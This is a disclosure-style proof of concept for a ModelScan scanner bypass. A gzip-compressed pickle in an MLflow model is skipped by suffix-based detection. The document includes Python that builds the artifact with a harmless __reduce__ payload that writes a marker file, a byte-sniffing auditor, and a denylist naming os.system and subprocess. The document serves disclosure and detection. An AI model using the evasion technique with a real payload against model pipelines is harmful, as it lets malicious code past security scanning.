MLflow Compressed Pickle ModelScan Bypass PoC
This is a harmless proof of concept for a gap in ModelScan's coverage of MLflow model files: a gzip-compressed pickle that MLflow will load is never scanned.
The MLmodel metadata points MLflow's python_function flavor at
python_model.pkl.gz and declares python_model_compression: gzip.
MLflow decompresses that file and passes it to cloudpickle.load() when
unsafe pickle deserialization is explicitly enabled.
ModelScan 0.8.8 never inspects the compressed pickle: its file-type detection
keys on the final .gz suffix alone, so the artifact is skipped and no issue is reported.
The payload is non-destructive. It only writes
mlflow_compressed_pickle_marker.txt containing
MLFLOW_COMPRESSED_PICKLE_BYPASS.
Reproduce
pip install -r requirements.txt
python verify_poc.py --model-dir .
Default MLflow loading blocks pickle deserialization. The verification script
then sets MLFLOW_ALLOW_PICKLE_DESERIALIZATION=true to demonstrate the unsafe
load path and marker creation.
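Added example, not code from this repository, MLflow or ModelScan: stdlib-only Python that builds the artifact described above (abbreviated MLmodel plus a gzip-wrapped pickle whose only effect on load is writing the marker file), then audits it by content instead of by suffix. The scanner sniffs the gzip magic bytes, decompresses, and walks the pickle with an Unpickler whose find_class returns an inert sentinel, so every (module, name) the stream would import is recorded without executing anything. The python_model key in the MLmodel text, the denylist of globals, and all helper names are assumptions; stdlib pickle stands in for cloudpickle on the unsafe load path.

```python
"""Build the gzip-wrapped pickle the PoC describes and audit it by content
(magic bytes + pickle globals) rather than by filename suffix. Stdlib only."""
import gzip
import io
import pathlib
import pickle
import tempfile

MARKER_NAME = "mlflow_compressed_pickle_marker.txt"
MARKER_TEXT = "MLFLOW_COMPRESSED_PICKLE_BYPASS"
# Abbreviated MLmodel carrying only the flavor keys the write-up names.
# The "python_model" key name is an assumption; real files hold more metadata.
MLMODEL = (
    "flavors:\n"
    "  python_function:\n"
    "    python_model: python_model.pkl.gz\n"
    "    python_model_compression: gzip\n"
)
# Illustrative denylist (assumption). builtins.getattr is what the payload
# below relies on; production scanners carry much longer lists.
UNSAFE_GLOBALS = {
    ("builtins", "getattr"), ("builtins", "eval"), ("builtins", "exec"),
    ("os", "system"), ("subprocess", "Popen"), ("subprocess", "run"),
}


class MarkerDropper:
    """Harmless payload: pickle reduces the bound method to
    getattr(Path(p), "write_text"), so loading runs Path(p).write_text(text)."""

    def __init__(self, marker_path):
        self.marker_path = str(marker_path)

    def __reduce__(self):
        return (pathlib.Path(self.marker_path).write_text, (MARKER_TEXT,))


def build_artifact(model_dir):
    """Write MLmodel and python_model.pkl.gz into model_dir; return the dir."""
    model_dir = pathlib.Path(model_dir)
    model_dir.mkdir(parents=True, exist_ok=True)
    payload = pickle.dumps(MarkerDropper(model_dir / MARKER_NAME), protocol=4)
    (model_dir / "python_model.pkl.gz").write_bytes(gzip.compress(payload))
    (model_dir / "MLmodel").write_text(MLMODEL)
    return model_dir


class _Opaque:
    """Inert stand-in for every global: REDUCE/BUILD succeed, nothing runs."""

    def __init__(self, *args, **kwargs):
        pass

    def __call__(self, *args, **kwargs):
        return _Opaque()

    def __setstate__(self, state):
        pass


class _AuditUnpickler(pickle.Unpickler):
    """Record each (module, name) the stream asks for, import none of them.
    GLOBAL and STACK_GLOBAL (memo lookups included) both land in find_class."""

    def __init__(self, data):
        super().__init__(io.BytesIO(data))
        self.seen = []

    def find_class(self, module, name):
        self.seen.append((module, name))
        return _Opaque


def audit_pickle(data):
    """Return the globals a pickle stream references without running it."""
    up = _AuditUnpickler(data)
    try:
        up.load()
    except Exception:  # truncated or hostile streams still report what was seen
        pass
    return up.seen


def scan_file(path):
    """Classify one artifact by its bytes; a suffix-only rule (the gap the
    write-up describes) would have skipped anything ending in .gz."""
    path = pathlib.Path(path)
    data = path.read_bytes()
    compressed = data[:2] == b"\x1f\x8b"  # gzip magic, whatever the name says
    if compressed:
        data = gzip.decompress(data)
    is_pickle = data[:1] == b"\x80"  # PROTO opcode opens every protocol>=2 pickle
    found = audit_pickle(data) if is_pickle else []
    return {
        "name": path.name,
        "skipped_by_suffix_rule": path.suffix == ".gz",
        "compressed": compressed,
        "pickle": is_pickle,
        "globals": found,
        "unsafe": any(g in UNSAFE_GLOBALS for g in found),
    }


def scan_model_dir(model_dir):
    """Scan every regular file in the model directory, keyed by file name."""
    root = pathlib.Path(model_dir)
    return {p.name: scan_file(p) for p in sorted(root.iterdir()) if p.is_file()}


def marker_exists(model_dir):
    return (pathlib.Path(model_dir) / MARKER_NAME).exists()


def unsafe_load(model_dir):
    """Mimic the load path the write-up describes (gunzip, then pickle load).
    Stdlib pickle stands in for cloudpickle. This EXECUTES the payload."""
    with gzip.open(pathlib.Path(model_dir) / "python_model.pkl.gz", "rb") as fh:
        pickle.load(fh)
    marker = pathlib.Path(model_dir) / MARKER_NAME
    return marker.read_text() if marker.exists() else None


def fresh_model_dir():
    return tempfile.mkdtemp(prefix="mlflow_gz_pickle_")


if __name__ == "__main__":
    d = build_artifact(fresh_model_dir())
    print(scan_model_dir(d)["python_model.pkl.gz"])
    print("after unsafe load:", unsafe_load(d))
```

The audit pass is the check worth keeping: it flags python_model.pkl.gz as a compressed pickle that pulls in builtins.getattr while leaving no marker file behind, and only the explicit unsafe_load call (the page's MLFLOW_ALLOW_PICKLE_DESERIALIZATION=true path) writes it. Protocol 0/1 text pickles lack the leading PROTO opcode and would need an opcode walk with pickletools.genops instead of the one-byte sniff used here.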